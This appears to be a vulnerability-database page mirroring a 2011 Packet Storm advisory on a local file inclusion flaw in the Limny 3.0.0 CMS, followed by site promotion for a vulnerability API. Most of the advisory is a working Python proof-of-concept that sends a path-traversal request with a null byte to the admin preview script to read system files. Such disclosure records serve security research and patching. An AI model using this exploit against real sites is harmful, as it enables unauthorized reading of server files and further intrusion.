Lucene search
K

Limny 3.0.0 Local File Inclusion

🗓️ 01 Feb 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

A local file inclusion vulnerability in Limny 3.0.0 can be exploited to include arbitrary files

Code
`# ------------------------------------------------------------------------  
# Software................Limny 3.0.0  
# Vulnerability...........Local File Inclusion  
# Download................http://www.limny.org/  
# Release Date............1/24/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A local file inclusion vulnerability in Limny 3.0.0 can be exploited  
# to include arbitrary files.  
#   
#   
# --PoC--  
import httplib, urllib  
  
host = 'localhost'  
path = '/limny-3.0.0'  
  
c = httplib.HTTPConnection(host)  
c.request('GET', path + '/admin/preview.php?theme=' + '..%2F' * 32 + 'windows/win.ini%00')  
r = c.getresponse()  
  
print r.status, r.reason  
print r.read()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation